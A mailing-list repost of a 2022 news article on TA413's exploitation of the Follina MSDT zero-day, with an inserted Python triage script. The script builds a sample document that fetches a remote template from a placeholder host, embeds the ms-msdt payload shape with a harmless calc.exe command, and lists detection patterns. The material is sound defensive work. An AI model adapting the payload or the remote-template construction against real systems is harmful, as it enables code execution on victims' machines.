[BreachExchange] Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability

Matthew Wheeler mwheeler at flashpoint-intel.com
Wed Jun 1 08:27:10 EDT 2022


https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html

An advanced persistent threat (APT) actor aligned with Chinese state
interests has been observed weaponizing the new zero-day flaw in Microsoft
Office to achieve code execution on affected systems.

"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using
URLs to deliver ZIP archives which contain Word Documents that use the
technique," enterprise security firm Proofpoint said in a tweet.

"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan
Administration and use the domain tibet-gov.web[.]app."

TA413 is best known for its campaigns aimed at the Tibetan diaspora to
deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox
browser extension dubbed FriarFox.

The high-severity security flaw, dubbed Follina and tracked as
CVE-2022-30190 (CVSS score: 7.8), is a remote code execution bug in the
Microsoft Support Diagnostic Tool (MSDT): a document hands MSDT a crafted
"ms-msdt:" protocol URI, and code smuggled into the URI's parameters runs
with the privileges of the calling application, such as Word.

Specifically, saving the document as Rich Text Format (RTF) instead of a
Word file sidesteps the Protected View safeguards for suspicious files: the
Preview Pane in Windows File Explorer renders RTF files, so the injected
code is triggered when the file is merely previewed, without the user ever
opening the document.

While the bug gained widespread attention last week, evidence points to
active exploitation of the diagnostic tool flaw in real-world attacks
targeting Russian users more than a month earlier, on April 12, 2022, the
day it was reported to Microsoft.

The company, however, did not deem it a security issue and closed the
vulnerability submission report, on the grounds that the MSDT utility
requires a passkey provided by a support technician before it can execute
payloads.

The vulnerability exists in all currently supported Windows versions and
can be exploited via Microsoft Office versions Office 2013 through Office
2021 and Office Professional Plus editions.

"This elegant attack is designed to bypass security products and fly under
the radar by leveraging Microsoft Office's remote template feature and the
ms-msdt protocol to execute malicious code, all without the need for
macros," Malwarebytes' Jerome Segura noted.
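The chain described above, a remote template fetch followed by an ms-msdt: URI handed to MSDT, as a static triage script. This is an added example and not code from the article, from Proofpoint or from Microsoft. The relationship types and MSDT parameter names are the standard OOXML and troubleshooter ones; the sample document, the template HTML, the calc.exe command and the example.invalid hostname are constructed stand-ins. It goes one step beyond the text by also flagging externally linked OLE objects, the other OOXML relationship that can pull remote content, which the article does not mention.

```python
"""Static triage for the Follina (CVE-2022-30190) delivery chain.

Added example, not code from the article, Proofpoint or Microsoft. It checks
the two stages the text describes: a Word document that pulls a remote
template, and a fetched HTML template whose script hands an ms-msdt: URI to
the Diagnostic Tool. Every sample input below is a constructed stand-in.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
# Relationship types that make Word fetch a URL: attachedTemplate is the
# remote-template feature; oleObject is the other externally linkable part.
REMOTE_TYPES = ("attachedTemplate", "oleObject")

# Indicators in the fetched stage: the scheme, the troubleshooter id, the
# parameter that gets evaluated, and the PowerShell subexpression/decoder.
# Obfuscation that assembles "ms-msdt:" at runtime from [char] codes is not
# decoded here, so a miss is not a clean bill of health.
INDICATORS = {
    "ms-msdt uri scheme": re.compile(r"ms-msdt:", re.I),
    "PCWDiagnostic troubleshooter": re.compile(r"/id\s+PCWDiagnostic", re.I),
    "IT_BrowseForFile parameter": re.compile(r"IT_BrowseForFile\s*=", re.I),
    "PowerShell subexpression": re.compile(r"\$\(\s*Invoke-Expression", re.I),
    "base64 decoder": re.compile(r"FromBase64String", re.I),
}


def external_relationships(docx_bytes):
    """(rels part, type, target) for every External relationship of a
    remote-capable type anywhere in the package, settings.xml.rels included."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in sorted(z.namelist()):
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel.get("TargetMode") == "External" and rel_type in REMOTE_TYPES:
                    hits.append((name, rel_type, rel.get("Target", "")))
    return hits


def msdt_indicators(html):
    """Indicator labels found in a fetched template. Percent-decoded first,
    since the URI is usually written percent-encoded inside location.href."""
    text = unquote(html)
    return [label for label, rx in INDICATORS.items() if rx.search(text)]


def triage(docx_bytes, fetched_html=None):
    """Verdict for a document plus, when captured, the template it fetched."""
    external = external_relationships(docx_bytes)
    indicators = msdt_indicators(fetched_html) if fetched_html else []
    if external and indicators:
        verdict = "follina-chain"
    elif external:
        verdict = "remote-content"
    else:
        verdict = "no-remote-content"
    return {"verdict": verdict, "external": external, "indicators": indicators}


def build_sample_docx(template_target=None):
    """Constructed minimal .docx (not real malware). With template_target set,
    the URL is wired in as an external attached template, which Word resolves
    when the document is opened; that is the remote-template feature."""
    rels = [f'<Relationships xmlns="{RELS_NS}">']
    if template_target:
        rels.append(f'<Relationship Id="rId1" Type="{R_NS}/attachedTemplate" '
                    f'Target="{template_target}" TargetMode="External"/>')
    rels.append("</Relationships>")
    attached = '<w:attachedTemplate r:id="rId1"/>' if template_target else ""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<Types xmlns="http://schemas.'
                   'openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        z.writestr("word/settings.xml", f'<w:settings xmlns:w="{W_NS}" '
                   f'xmlns:r="{R_NS}">{attached}</w:settings>')
        z.writestr("word/_rels/settings.xml.rels", "\n".join(rels))
    return buf.getvalue()


# Constructed stand-in for a fetched template: the shape of the public
# payload, but the embedded command is a harmless calc.exe.
SAMPLE_HTML = (
    "<!doctype html><html><body><script>\n"
    'window.location.href = "ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20'
    "/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20"
    "IT_BrowseForFile=$(Invoke-Expression('calc.exe'))%22\";\n"
    "</script></body></html>"
)

if __name__ == "__main__":
    doc = build_sample_docx("https://template.example.invalid/template.html")
    print(triage(doc, SAMPLE_HTML))
```

Run it against a suspect .docx and, where a proxy captured it, the HTML the document fetched; a document with an external relationship but no captured template still gets a "remote-content" verdict, which is the cue to pull the template from the proxy log. It is a triage aid rather than a detector: the indicators are string matches, and a template that builds the scheme at runtime from character codes will slip past them.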

Although there is no official patch available at this point, Microsoft has
recommended disabling the MSDT URL protocol to cut off the attack vector; its
workaround is to back up and then delete the HKEY_CLASSES_ROOT\ms-msdt
registry key that registers the handler, which can be restored from the
backup once a fix ships. Additionally, it's been advised to turn off the
Preview Pane in File Explorer so that a crafted RTF is not rendered merely
by being selected.

"What makes 'Follina' stand out is that this exploit does not take
advantage of Office macros and, therefore, it works even in environments
where macros have been disabled entirely," Nikolas Cemerikic of Immersive
Labs said.

"All that's required for the exploit to take effect is for a user to open
and view the Word document, or to view a preview of the document using the
Windows Explorer Preview Pane. Since the latter does not require Word to
launch fully, this effectively becomes a zero-click attack."